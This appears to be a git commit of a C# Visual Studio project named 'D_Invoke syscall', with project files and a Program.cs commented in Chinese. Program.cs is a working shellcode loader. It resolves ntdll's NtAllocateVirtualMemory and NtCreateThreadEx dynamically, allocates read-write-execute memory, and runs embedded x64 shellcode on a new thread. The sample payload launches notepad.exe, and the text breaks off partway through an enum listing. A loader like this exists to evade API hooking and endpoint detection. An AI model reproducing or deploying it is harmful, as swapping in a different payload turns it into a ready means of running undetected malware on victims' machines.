This commit is contained in:
commit
85feab0b9e
Binary file not shown.
|
@ -0,0 +1,48 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
|
||||
<PropertyGroup>
|
||||
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
|
||||
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
|
||||
<ProjectGuid>{E1059CA6-33B6-4B4C-9070-A09CD05B11B2}</ProjectGuid>
|
||||
<OutputType>Exe</OutputType>
|
||||
<RootNamespace>D_Invoke_syscall</RootNamespace>
|
||||
<AssemblyName>D_Invoke syscall</AssemblyName>
|
||||
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
|
||||
<FileAlignment>512</FileAlignment>
|
||||
<Deterministic>true</Deterministic>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
|
||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
||||
<DebugSymbols>true</DebugSymbols>
|
||||
<DebugType>full</DebugType>
|
||||
<Optimize>false</Optimize>
|
||||
<OutputPath>bin\Debug\</OutputPath>
|
||||
<DefineConstants>DEBUG;TRACE</DefineConstants>
|
||||
<ErrorReport>prompt</ErrorReport>
|
||||
<WarningLevel>4</WarningLevel>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
|
||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
||||
<DebugType>pdbonly</DebugType>
|
||||
<Optimize>true</Optimize>
|
||||
<OutputPath>bin\Release\</OutputPath>
|
||||
<DefineConstants>TRACE</DefineConstants>
|
||||
<ErrorReport>prompt</ErrorReport>
|
||||
<WarningLevel>4</WarningLevel>
|
||||
</PropertyGroup>
|
||||
<ItemGroup>
|
||||
<Reference Include="System" />
|
||||
<Reference Include="System.Core" />
|
||||
<Reference Include="System.Xml.Linq" />
|
||||
<Reference Include="System.Data.DataSetExtensions" />
|
||||
<Reference Include="Microsoft.CSharp" />
|
||||
<Reference Include="System.Data" />
|
||||
<Reference Include="System.Xml" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Compile Include="Program.cs" />
|
||||
<Compile Include="Properties\AssemblyInfo.cs" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
|
||||
</Project>
|
|
@ -0,0 +1,25 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio Version 16
|
||||
VisualStudioVersion = 16.0.29926.136
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "D_Invoke syscall", "D_Invoke syscall.csproj", "{E1059CA6-33B6-4B4C-9070-A09CD05B11B2}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|Any CPU = Debug|Any CPU
|
||||
Release|Any CPU = Release|Any CPU
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{E1059CA6-33B6-4B4C-9070-A09CD05B11B2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
|
||||
{E1059CA6-33B6-4B4C-9070-A09CD05B11B2}.Debug|Any CPU.Build.0 = Debug|Any CPU
|
||||
{E1059CA6-33B6-4B4C-9070-A09CD05B11B2}.Release|Any CPU.ActiveCfg = Release|Any CPU
|
||||
{E1059CA6-33B6-4B4C-9070-A09CD05B11B2}.Release|Any CPU.Build.0 = Release|Any CPU
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||
SolutionGuid = {B4629ECC-1B52-459C-B9AF-0A7904437F69}
|
||||
EndGlobalSection
|
||||
EndGlobal
|
|
@ -0,0 +1,828 @@
|
|||
using System;
|
||||
using System.ComponentModel;
|
||||
using System.Diagnostics;
|
||||
using System.IO;
|
||||
using System.Runtime.InteropServices;
|
||||
|
||||
namespace D_Invoke_syscall
|
||||
{
|
||||
class Program
|
||||
{
|
||||
static void Main(string[] args)
|
||||
{
|
||||
byte[] notepadShellcode_x64 = new byte[] {
|
||||
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
|
||||
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
|
||||
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
|
||||
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
|
||||
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
|
||||
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
|
||||
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
|
||||
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
|
||||
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
|
||||
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
|
||||
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
|
||||
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
|
||||
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
|
||||
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
|
||||
0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
|
||||
0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
|
||||
0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
|
||||
0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x43,0x3a,0x5c,
|
||||
0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x5c,0x53,0x79,0x73,0x74,0x65,0x6d,0x33,
|
||||
0x32,0x5c,0x6e,0x6f,0x74,0x65,0x70,0x61,0x64,0x2e,0x65,0x78,0x65,0x00 };
|
||||
Native.NTSTATUS success;
|
||||
|
||||
IntPtr hProcess = Native.GetCurrentProcess(); // 进程句柄,当前进程为-1
|
||||
IntPtr BaseAddress = IntPtr.Zero; // 接收分配的内存地址
|
||||
IntPtr ZeroBits = IntPtr.Zero;
|
||||
UIntPtr RegionSize = new UIntPtr(Convert.ToUInt32(notepadShellcode_x64.Length)); // 申请的内存大小
|
||||
uint AllocationType = (uint)Native.AllocationType.Commit | (uint)Native.AllocationType.Reserve; // 分配类型
|
||||
uint Protect = (uint)Native.AllocationProtect.PAGE_EXECUTE_READWRITE; // 内存权限:读写执行
|
||||
|
||||
IntPtr pointer = TinySharpSploit.GetLibraryAddress("ntdll.dll", "NtAllocateVirtualMemory");
|
||||
Delegates.NtAllocateVirtualMemory NtAllocateVirtualMemory = Marshal.GetDelegateForFunctionPointer(pointer, typeof(Delegates.NtAllocateVirtualMemory)) as Delegates.NtAllocateVirtualMemory;
|
||||
success = NtAllocateVirtualMemory(hProcess, ref BaseAddress, ZeroBits, ref RegionSize, AllocationType, Protect);
|
||||
Console.WriteLine($"NtAllocateVirtualMemory -> {success}");
|
||||
Console.WriteLine($"申请的内存地址 -> 0x{BaseAddress.ToString("X")}");
|
||||
|
||||
|
||||
// 把notepadShellcode复制到申请的BaseAddress内存
|
||||
Marshal.Copy(notepadShellcode_x64, 0, BaseAddress, notepadShellcode_x64.Length);
|
||||
|
||||
|
||||
IntPtr hThread = IntPtr.Zero; // 接收线程句柄
|
||||
Native.ACCESS_MASK DesiredAccess = Native.ACCESS_MASK.SPECIFIC_RIGHTS_ALL | Native.ACCESS_MASK.STANDARD_RIGHTS_ALL; // 访问权限
|
||||
IntPtr ObjectAttributes = IntPtr.Zero;
|
||||
IntPtr lpParameter = IntPtr.Zero;
|
||||
bool CreateSuspended = false; // 是否挂起
|
||||
uint StackZeroBits = 0;
|
||||
uint SizeOfStackCommit = 0xFFFF; // 65535
|
||||
uint SizeOfStackReserve = 0xFFFF; // 65535
|
||||
IntPtr lpBytesBuffer = IntPtr.Zero;
|
||||
|
||||
pointer = TinySharpSploit.GetLibraryAddress("ntdll.dll", "NtCreateThreadEx");
|
||||
Delegates.NtCreateThreadEx NtCreateThreadEx = Marshal.GetDelegateForFunctionPointer(pointer, typeof(Delegates.NtCreateThreadEx)) as Delegates.NtCreateThreadEx;
|
||||
success = NtCreateThreadEx(out hThread, DesiredAccess, ObjectAttributes, hProcess, BaseAddress, lpParameter, CreateSuspended, StackZeroBits, SizeOfStackCommit, SizeOfStackReserve, lpBytesBuffer);
|
||||
Console.WriteLine($"NtCreateThreadEx -> {success}\nThread Id -> {Native.GetThreadId(hThread)}");
|
||||
|
||||
|
||||
Console.WriteLine(new Win32Exception());
|
||||
|
||||
|
||||
pointer = TinySharpSploit.GetLibraryAddress("ntdll.dll", "NtWaitForSingleObject");
|
||||
Delegates.NtWaitForSingleObject NtWaitForSingleObject = Marshal.GetDelegateForFunctionPointer(pointer, typeof(Delegates.NtWaitForSingleObject)) as Delegates.NtWaitForSingleObject;
|
||||
success = NtWaitForSingleObject(hThread, false, 0);
|
||||
Console.WriteLine($"NtWaitForSingleObject -> {success}");
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
class Delegates
|
||||
{
|
||||
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||
public delegate Native.NTSTATUS NtCreateThreadEx(
|
||||
out IntPtr hThread,
|
||||
Native.ACCESS_MASK DesiredAccess,
|
||||
IntPtr ObjectAttributes,
|
||||
IntPtr ProcessHandle,
|
||||
IntPtr lpStartAddress,
|
||||
IntPtr lpParameter,
|
||||
bool CreateSuspended,
|
||||
uint StackZeroBits,
|
||||
uint SizeOfStackCommit,
|
||||
uint SizeOfStackReserve,
|
||||
IntPtr lpBytesBuffer
|
||||
);
|
||||
|
||||
// https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntallocatevirtualmemory
|
||||
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||
public delegate Native.NTSTATUS NtAllocateVirtualMemory(
|
||||
IntPtr ProcessHandle,
|
||||
ref IntPtr BaseAddress,
|
||||
IntPtr ZeroBits,
|
||||
ref UIntPtr RegionSize,
|
||||
ulong AllocationType,
|
||||
ulong Protect
|
||||
);
|
||||
|
||||
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||
public delegate Native.NTSTATUS NtWaitForSingleObject(
|
||||
IntPtr Object,
|
||||
bool Alertable,
|
||||
uint Timeout
|
||||
);
|
||||
|
||||
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||
public delegate void RtlInitUnicodeString(ref Native.UNICODE_STRING DestinationString, [MarshalAs(UnmanagedType.LPWStr)] string SourceString);
|
||||
}
|
||||
|
||||
public class Native
|
||||
{
|
||||
// https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55
|
||||
public enum NTSTATUS : uint
|
||||
{
|
||||
// Success
|
||||
Success = 0x00000000,
|
||||
// Wait0 = 0x00000000,
|
||||
Wait1 = 0x00000001,
|
||||
Wait2 = 0x00000002,
|
||||
Wait3 = 0x00000003,
|
||||
Wait63 = 0x0000003f,
|
||||
Abandoned = 0x00000080,
|
||||
AbandonedWait0 = 0x00000080,
|
||||
AbandonedWait1 = 0x00000081,
|
||||
AbandonedWait2 = 0x00000082,
|
||||
AbandonedWait3 = 0x00000083,
|
||||
AbandonedWait63 = 0x000000bf,
|
||||
UserApc = 0x000000c0,
|
||||
KernelApc = 0x00000100,
|
||||
Alerted = 0x00000101,
|
||||
Timeout = 0x00000102,
|
||||
Pending = 0x00000103,
|
||||
Reparse = 0x00000104,
|
||||
MoreEntries = 0x00000105,
|
||||
NotAllAssigned = 0x00000106,
|
||||
SomeNotMapped = 0x00000107,
|
||||
OpLockBreakInProgress = 0x00000108,
|
||||
VolumeMounted = 0x00000109,
|
||||
RxActCommitted = 0x0000010a,
|
||||
NotifyCleanup = 0x0000010b,
|
||||
NotifyEnumDir = 0x0000010c,
|
||||
NoQuotasForAccount = 0x0000010d,
|
||||
PrimaryTransportConnectFailed = 0x0000010e,
|
||||
PageFaultTransition = 0x00000110,
|
||||
PageFaultDemandZero = 0x00000111,
|
||||
PageFaultCopyOnWrite = 0x00000112,
|
||||
PageFaultGuardPage = 0x00000113,
|
||||
PageFaultPagingFile = 0x00000114,
|
||||
CrashDump = 0x00000116,
|
||||
ReparseObject = 0x00000118,
|
||||
NothingToTerminate = 0x00000122,
|
||||
ProcessNotInJob = 0x00000123,
|
||||
ProcessInJob = 0x00000124,
|
||||
ProcessCloned = 0x00000129,
|
||||
FileLockedWithOnlyReaders = 0x0000012a,
|
||||
FileLockedWithWriters = 0x0000012b,
|
||||
|
||||
// Informational
|
||||
Informational = 0x40000000,
|
||||
ObjectNameExists = 0x40000000,
|
||||
ThreadWasSuspended = 0x40000001,
|
||||
WorkingSetLimitRange = 0x40000002,
|
||||
ImageNotAtBase = 0x40000003,
|
||||
RegistryRecovered = 0x40000009,
|
||||
|
||||
// Warning
|
||||
Warning = 0x80000000,
|
||||
GuardPageViolation = 0x80000001,
|
||||
DatatypeMisalignment = 0x80000002,
|
||||
Breakpoint = 0x80000003,
|
||||
SingleStep = 0x80000004,
|
||||
BufferOverflow = 0x80000005,
|
||||
NoMoreFiles = 0x80000006,
|
||||
HandlesClosed = 0x8000000a,
|
||||
PartialCopy = 0x8000000d,
|
||||
DeviceBusy = 0x80000011,
|
||||
InvalidEaName = 0x80000013,
|
||||
EaListInconsistent = 0x80000014,
|
||||
NoMoreEntries = 0x8000001a,
|
||||
LongJump = 0x80000026,
|
||||
DllMightBeInsecure = 0x8000002b,
|
||||
|
||||
// Error
|
||||
Error = 0xc0000000,
|
||||
Unsuccessful = 0xc0000001,
|
||||
NotImplemented = 0xc0000002,
|
||||
InvalidInfoClass = 0xc0000003,
|
||||
InfoLengthMismatch = 0xc0000004,
|
||||
AccessViolation = 0xc0000005,
|
||||
InPageError = 0xc0000006,
|
||||
PagefileQuota = 0xc0000007,
|
||||
InvalidHandle = 0xc0000008,
|
||||
BadInitialStack = 0xc0000009,
|
||||
BadInitialPc = 0xc000000a,
|
||||
InvalidCid = 0xc000000b,
|
||||
TimerNotCanceled = 0xc000000c,
|
||||
InvalidParameter = 0xc000000d,
|
||||
NoSuchDevice = 0xc000000e,
|
||||
NoSuchFile = 0xc000000f,
|
||||
InvalidDeviceRequest = 0xc0000010,
|
||||
EndOfFile = 0xc0000011,
|
||||
WrongVolume = 0xc0000012,
|
||||
NoMediaInDevice = 0xc0000013,
|
||||
NoMemory = 0xc0000017,
|
||||
NotMappedView = 0xc0000019,
|
||||
UnableToFreeVm = 0xc000001a,
|
||||
UnableToDeleteSection = 0xc000001b,
|
||||
IllegalInstruction = 0xc000001d,
|
||||
AlreadyCommitted = 0xc0000021,
|
||||
AccessDenied = 0xc0000022,
|
||||
BufferTooSmall = 0xc0000023,
|
||||
ObjectTypeMismatch = 0xc0000024,
|
||||
NonContinuableException = 0xc0000025,
|
||||
BadStack = 0xc0000028,
|
||||
NotLocked = 0xc000002a,
|
||||
NotCommitted = 0xc000002d,
|
||||
InvalidParameterMix = 0xc0000030,
|
||||
ObjectNameInvalid = 0xc0000033,
|
||||
ObjectNameNotFound = 0xc0000034,
|
||||
ObjectNameCollision = 0xc0000035,
|
||||
ObjectPathInvalid = 0xc0000039,
|
||||
ObjectPathNotFound = 0xc000003a,
|
||||
ObjectPathSyntaxBad = 0xc000003b,
|
||||
DataOverrun = 0xc000003c,
|
||||
DataLate = 0xc000003d,
|
||||
DataError = 0xc000003e,
|
||||
CrcError = 0xc000003f,
|
||||
SectionTooBig = 0xc0000040,
|
||||
PortConnectionRefused = 0xc0000041,
|
||||
InvalidPortHandle = 0xc0000042,
|
||||
SharingViolation = 0xc0000043,
|
||||
QuotaExceeded = 0xc0000044,
|
||||
InvalidPageProtection = 0xc0000045,
|
||||
MutantNotOwned = 0xc0000046,
|
||||
SemaphoreLimitExceeded = 0xc0000047,
|
||||
PortAlreadySet = 0xc0000048,
|
||||
SectionNotImage = 0xc0000049,
|
||||
SuspendCountExceeded = 0xc000004a,
|
||||
ThreadIsTerminating = 0xc000004b,
|
||||
BadWorkingSetLimit = 0xc000004c,
|
||||
IncompatibleFileMap = 0xc000004d,
|
||||
SectionProtection = 0xc000004e,
|
||||
EasNotSupported = 0xc000004f,
|
||||
EaTooLarge = 0xc0000050,
|
||||
NonExistentEaEntry = 0xc0000051,
|
||||
NoEasOnFile = 0xc0000052,
|
||||
EaCorruptError = 0xc0000053,
|
||||
FileLockConflict = 0xc0000054,
|
||||
LockNotGranted = 0xc0000055,
|
||||
DeletePending = 0xc0000056,
|
||||
CtlFileNotSupported = 0xc0000057,
|
||||
UnknownRevision = 0xc0000058,
|
||||
RevisionMismatch = 0xc0000059,
|
||||
InvalidOwner = 0xc000005a,
|
||||
InvalidPrimaryGroup = 0xc000005b,
|
||||
NoImpersonationToken = 0xc000005c,
|
||||
CantDisableMandatory = 0xc000005d,
|
||||
NoLogonServers = 0xc000005e,
|
||||
NoSuchLogonSession = 0xc000005f,
|
||||
NoSuchPrivilege = 0xc0000060,
|
||||
PrivilegeNotHeld = 0xc0000061,
|
||||
InvalidAccountName = 0xc0000062,
|
||||
UserExists = 0xc0000063,
|
||||
NoSuchUser = 0xc0000064,
|
||||
GroupExists = 0xc0000065,
|
||||
NoSuchGroup = 0xc0000066,
|
||||
MemberInGroup = 0xc0000067,
|
||||
MemberNotInGroup = 0xc0000068,
|
||||
LastAdmin = 0xc0000069,
|
||||
WrongPassword = 0xc000006a,
|
||||
IllFormedPassword = 0xc000006b,
|
||||
PasswordRestriction = 0xc000006c,
|
||||
LogonFailure = 0xc000006d,
|
||||
AccountRestriction = 0xc000006e,
|
||||
InvalidLogonHours = 0xc000006f,
|
||||
InvalidWorkstation = 0xc0000070,
|
||||
PasswordExpired = 0xc0000071,
|
||||
AccountDisabled = 0xc0000072,
|
||||
NoneMapped = 0xc0000073,
|
||||
TooManyLuidsRequested = 0xc0000074,
|
||||
LuidsExhausted = 0xc0000075,
|
||||
InvalidSubAuthority = 0xc0000076,
|
||||
InvalidAcl = 0xc0000077,
|
||||
InvalidSid = 0xc0000078,
|
||||
InvalidSecurityDescr = 0xc0000079,
|
||||
ProcedureNotFound = 0xc000007a,
|
||||
InvalidImageFormat = 0xc000007b,
|
||||
NoToken = 0xc000007c,
|
||||
BadInheritanceAcl = 0xc000007d,
|
||||
RangeNotLocked = 0xc000007e,
|
||||
DiskFull = 0xc000007f,
|
||||
ServerDisabled = 0xc0000080,
|
||||
ServerNotDisabled = 0xc0000081,
|
||||
TooManyGuidsRequested = 0xc0000082,
|
||||
GuidsExhausted = 0xc0000083,
|
||||
InvalidIdAuthority = 0xc0000084,
|
||||
AgentsExhausted = 0xc0000085,
|
||||
InvalidVolumeLabel = 0xc0000086,
|
||||
SectionNotExtended = 0xc0000087,
|
||||
NotMappedData = 0xc0000088,
|
||||
ResourceDataNotFound = 0xc0000089,
|
||||
ResourceTypeNotFound = 0xc000008a,
|
||||
ResourceNameNotFound = 0xc000008b,
|
||||
ArrayBoundsExceeded = 0xc000008c,
|
||||
FloatDenormalOperand = 0xc000008d,
|
||||
FloatDivideByZero = 0xc000008e,
|
||||
FloatInexactResult = 0xc000008f,
|
||||
FloatInvalidOperation = 0xc0000090,
|
||||
FloatOverflow = 0xc0000091,
|
||||
FloatStackCheck = 0xc0000092,
|
||||
FloatUnderflow = 0xc0000093,
|
||||
IntegerDivideByZero = 0xc0000094,
|
||||
IntegerOverflow = 0xc0000095,
|
||||
PrivilegedInstruction = 0xc0000096,
|
||||
TooManyPagingFiles = 0xc0000097,
|
||||
FileInvalid = 0xc0000098,
|
||||
InstanceNotAvailable = 0xc00000ab,
|
||||
PipeNotAvailable = 0xc00000ac,
|
||||
InvalidPipeState = 0xc00000ad,
|
||||
PipeBusy = 0xc00000ae,
|
||||
IllegalFunction = 0xc00000af,
|
||||
PipeDisconnected = 0xc00000b0,
|
||||
PipeClosing = 0xc00000b1,
|
||||
PipeConnected = 0xc00000b2,
|
||||
PipeListening = 0xc00000b3,
|
||||
InvalidReadMode = 0xc00000b4,
|
||||
IoTimeout = 0xc00000b5,
|
||||
FileForcedClosed = 0xc00000b6,
|
||||
ProfilingNotStarted = 0xc00000b7,
|
||||
ProfilingNotStopped = 0xc00000b8,
|
||||
NotSameDevice = 0xc00000d4,
|
||||
FileRenamed = 0xc00000d5,
|
||||
CantWait = 0xc00000d8,
|
||||
PipeEmpty = 0xc00000d9,
|
||||
CantTerminateSelf = 0xc00000db,
|
||||
InternalError = 0xc00000e5,
|
||||
InvalidParameter1 = 0xc00000ef,
|
||||
InvalidParameter2 = 0xc00000f0,
|
||||
InvalidParameter3 = 0xc00000f1,
|
||||
InvalidParameter4 = 0xc00000f2,
|
||||
InvalidParameter5 = 0xc00000f3,
|
||||
InvalidParameter6 = 0xc00000f4,
|
||||
InvalidParameter7 = 0xc00000f5,
|
||||
InvalidParameter8 = 0xc00000f6,
|
||||
InvalidParameter9 = 0xc00000f7,
|
||||
InvalidParameter10 = 0xc00000f8,
|
||||
InvalidParameter11 = 0xc00000f9,
|
||||
InvalidParameter12 = 0xc00000fa,
|
||||
MappedFileSizeZero = 0xc000011e,
|
||||
TooManyOpenedFiles = 0xc000011f,
|
||||
Cancelled = 0xc0000120,
|
||||
CannotDelete = 0xc0000121,
|
||||
InvalidComputerName = 0xc0000122,
|
||||
FileDeleted = 0xc0000123,
|
||||
SpecialAccount = 0xc0000124,
|
||||
SpecialGroup = 0xc0000125,
|
||||
SpecialUser = 0xc0000126,
|
||||
MembersPrimaryGroup = 0xc0000127,
|
||||
FileClosed = 0xc0000128,
|
||||
TooManyThreads = 0xc0000129,
|
||||
ThreadNotInProcess = 0xc000012a,
|
||||
TokenAlreadyInUse = 0xc000012b,
|
||||
PagefileQuotaExceeded = 0xc000012c,
|
||||
CommitmentLimit = 0xc000012d,
|
||||
InvalidImageLeFormat = 0xc000012e,
|
||||
InvalidImageNotMz = 0xc000012f,
|
||||
InvalidImageProtect = 0xc0000130,
|
||||
InvalidImageWin16 = 0xc0000131,
|
||||
LogonServer = 0xc0000132,
|
||||
DifferenceAtDc = 0xc0000133,
|
||||
SynchronizationRequired = 0xc0000134,
|
||||
DllNotFound = 0xc0000135,
|
||||
IoPrivilegeFailed = 0xc0000137,
|
||||
OrdinalNotFound = 0xc0000138,
|
||||
EntryPointNotFound = 0xc0000139,
|
||||
ControlCExit = 0xc000013a,
|
||||
PortNotSet = 0xc0000353,
|
||||
DebuggerInactive = 0xc0000354,
|
||||
CallbackBypass = 0xc0000503,
|
||||
PortClosed = 0xc0000700,
|
||||
MessageLost = 0xc0000701,
|
||||
InvalidMessage = 0xc0000702,
|
||||
RequestCanceled = 0xc0000703,
|
||||
RecursiveDispatch = 0xc0000704,
|
||||
LpcReceiveBufferExpected = 0xc0000705,
|
||||
LpcInvalidConnectionUsage = 0xc0000706,
|
||||
LpcRequestsNotAllowed = 0xc0000707,
|
||||
ResourceInUse = 0xc0000708,
|
||||
ProcessIsProtected = 0xc0000712,
|
||||
VolumeDirty = 0xc0000806,
|
||||
FileCheckedOut = 0xc0000901,
|
||||
CheckOutRequired = 0xc0000902,
|
||||
BadFileType = 0xc0000903,
|
||||
FileTooLarge = 0xc0000904,
|
||||
FormsAuthRequired = 0xc0000905,
|
||||
VirusInfected = 0xc0000906,
|
||||
VirusDeleted = 0xc0000907,
|
||||
TransactionalConflict = 0xc0190001,
|
||||
InvalidTransaction = 0xc0190002,
|
||||
TransactionNotActive = 0xc0190003,
|
||||
TmInitializationFailed = 0xc0190004,
|
||||
RmNotActive = 0xc0190005,
|
||||
RmMetadataCorrupt = 0xc0190006,
|
||||
TransactionNotJoined = 0xc0190007,
|
||||
DirectoryNotRm = 0xc0190008,
|
||||
CouldNotResizeLog = 0xc0190009,
|
||||
TransactionsUnsupportedRemote = 0xc019000a,
|
||||
LogResizeInvalidSize = 0xc019000b,
|
||||
RemoteFileVersionMismatch = 0xc019000c,
|
||||
CrmProtocolAlreadyExists = 0xc019000f,
|
||||
TransactionPropagationFailed = 0xc0190010,
|
||||
CrmProtocolNotFound = 0xc0190011,
|
||||
TransactionSuperiorExists = 0xc0190012,
|
||||
TransactionRequestNotValid = 0xc0190013,
|
||||
TransactionNotRequested = 0xc0190014,
|
||||
TransactionAlreadyAborted = 0xc0190015,
|
||||
TransactionAlreadyCommitted = 0xc0190016,
|
||||
TransactionInvalidMarshallBuffer = 0xc0190017,
|
||||
CurrentTransactionNotValid = 0xc0190018,
|
||||
LogGrowthFailed = 0xc0190019,
|
||||
ObjectNoLongerExists = 0xc0190021,
|
||||
StreamMiniversionNotFound = 0xc0190022,
|
||||
StreamMiniversionNotValid = 0xc0190023,
|
||||
MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024,
|
||||
CantOpenMiniversionWithModifyIntent = 0xc0190025,
|
||||
CantCreateMoreStreamMiniversions = 0xc0190026,
|
||||
HandleNoLongerValid = 0xc0190028,
|
||||
NoTxfMetadata = 0xc0190029,
|
||||
LogCorruptionDetected = 0xc0190030,
|
||||
CantRecoverWithHandleOpen = 0xc0190031,
|
||||
RmDisconnected = 0xc0190032,
|
||||
EnlistmentNotSuperior = 0xc0190033,
|
||||
RecoveryNotNeeded = 0xc0190034,
|
||||
RmAlreadyStarted = 0xc0190035,
|
||||
FileIdentityNotPersistent = 0xc0190036,
|
||||
CantBreakTransactionalDependency = 0xc0190037,
|
||||
CantCrossRmBoundary = 0xc0190038,
|
||||
TxfDirNotEmpty = 0xc0190039,
|
||||
IndoubtTransactionsExist = 0xc019003a,
|
||||
TmVolatile = 0xc019003b,
|
||||
RollbackTimerExpired = 0xc019003c,
|
||||
TxfAttributeCorrupt = 0xc019003d,
|
||||
EfsNotAllowedInTransaction = 0xc019003e,
|
||||
TransactionalOpenNotAllowed = 0xc019003f,
|
||||
TransactedMappingUnsupportedRemote = 0xc0190040,
|
||||
TxfMetadataAlreadyPresent = 0xc0190041,
|
||||
TransactionScopeCallbacksNotSet = 0xc0190042,
|
||||
TransactionRequiredPromotion = 0xc0190043,
|
||||
CannotExecuteFileInTransaction = 0xc0190044,
|
||||
TransactionsNotFrozen = 0xc0190045,
|
||||
MaximumNtStatus = 0xffffffff
|
||||
}
|
||||
|
||||
// http://www.pinvoke.net/default.aspx/kernel32/VirtualAlloc.html
|
||||
// NtAllocateVirtualMemory - ULONG AllocationType
|
||||
[Flags]
|
||||
public enum AllocationType : ulong
|
||||
{
|
||||
Commit = 0x1000,
|
||||
Reserve = 0x2000,
|
||||
Decommit = 0x4000,
|
||||
Release = 0x8000,
|
||||
Reset = 0x80000,
|
||||
Physical = 0x400000,
|
||||
TopDown = 0x100000,
|
||||
WriteWatch = 0x200000,
|
||||
LargePages = 0x20000000
|
||||
}
|
||||
|
||||
// http://www.pinvoke.net/default.aspx/Enums/ACCESS_MASK.html
|
||||
// NtCreateThread - ACCESS_MASK DesiredAccess
|
||||
[Flags]
|
||||
public enum ACCESS_MASK : uint
|
||||
{
|
||||
DELETE = 0x00010000,
|
||||
READ_CONTROL = 0x00020000,
|
||||
WRITE_DAC = 0x00040000,
|
||||
WRITE_OWNER = 0x00080000,
|
||||
SYNCHRONIZE = 0x00100000,
|
||||
STANDARD_RIGHTS_REQUIRED = 0x000F0000,
|
||||
STANDARD_RIGHTS_READ = 0x00020000,
|
||||
STANDARD_RIGHTS_WRITE = 0x00020000,
|
||||
STANDARD_RIGHTS_EXECUTE = 0x00020000,
|
||||
STANDARD_RIGHTS_ALL = 0x001F0000,
|
||||
SPECIFIC_RIGHTS_ALL = 0x0000FFFF,
|
||||
ACCESS_SYSTEM_SECURITY = 0x01000000,
|
||||
MAXIMUM_ALLOWED = 0x02000000,
|
||||
GENERIC_READ = 0x80000000,
|
||||
GENERIC_WRITE = 0x40000000,
|
||||
GENERIC_EXECUTE = 0x20000000,
|
||||
GENERIC_ALL = 0x10000000,
|
||||
DESKTOP_READOBJECTS = 0x00000001,
|
||||
DESKTOP_CREATEWINDOW = 0x00000002,
|
||||
